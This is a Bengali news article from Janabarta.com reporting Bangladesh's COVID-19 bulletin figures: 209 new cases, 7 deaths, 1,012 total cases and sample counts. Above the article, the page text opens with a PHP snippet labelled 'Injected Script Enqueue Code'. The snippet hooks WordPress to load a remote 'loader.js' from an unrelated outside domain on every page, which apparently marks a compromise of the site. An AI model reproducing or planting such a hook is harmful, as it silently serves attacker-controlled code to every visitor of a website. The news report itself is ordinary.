// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site ২৪ ঘন্টায় রেকর্ড ২০৯ জন শনাক্ত, মৃত্যু ৭ - Janabarta.com

২৪ ঘন্টায় রেকর্ড ২০৯ জন শনাক্ত, মৃত্যু ৭

নিজস্ব প্রতিবেদক: দেশে একদিনের ব্যবধানে করোনাভাইরাসে সংক্রমণ ও মৃতের সংখ্যা ফের বেড়েছে। গত ২৪ ঘণ্টায় রেকর্ড ২০৯ জনের শরীরে কোভিড-১৯ শনাক্ত করা হয়েছে। মৃত্যুবরণ করেছেন আরো ৭ জন। এ নিয়ে মৃতের সংখ্যা বেড়ে দাঁড়ালো ৪৬ জনে এবং মোট আক্রান্তের সংখ্যা হাজার ছাড়ালো।

আজ মঙ্গলবার বেলা আড়াইটায় স্বাস্থ্য অধিদপ্তরের করোনা সংক্রান্ত বুলেটিনে যুক্ত হয়ে স্বাস্থ্য অধিদপ্তরের অতিরিক্ত মহাপরিচালক অধ্যাপক ডা. নাসিমা সুলতানা এ তথ্য জানান।

তিনি বলেন, গত ২৪ ঘণ্টায় আরো ২০৯ জন করোনা রোগী শনাক্ত করা হয়েছে। এ নিয়ে মোট আক্রান্ত হলো ১ হাজার ১২ জন। এ ছাড়া নতুন করে আরো ৭ জনের মৃত্যু হয়েছে। মোট মৃতের সংখ্যা বেড়ে দাঁড়ালো ৪৬ জনে। তবে নতুন করে কেউ সুস্থ হননি। এখন পর্যন্ত সুস্থ হয়ে বাড়ি ফিরেছেন ৪২ জন।

ডা. নাসিমা সুলতানা বলেন, দেশে গত ২৪ ঘণ্টায় নতুন করে ১৮০৪ জনের নমুনা সংগ্রহ করা হয়েছে। আর আগের কিছুসহ মোট ১৯০৫ জনের নমুনা পরীক্ষা করা হয়েছে। এ নিয়ে এখন পর্যন্ত মোট নমুনা সংগ্রহ করা হয়েছে ১৩৮২৮ জনের। গত ৮ মার্চ প্রথম দেশে করোনা রোগী শনাক্ত হয়।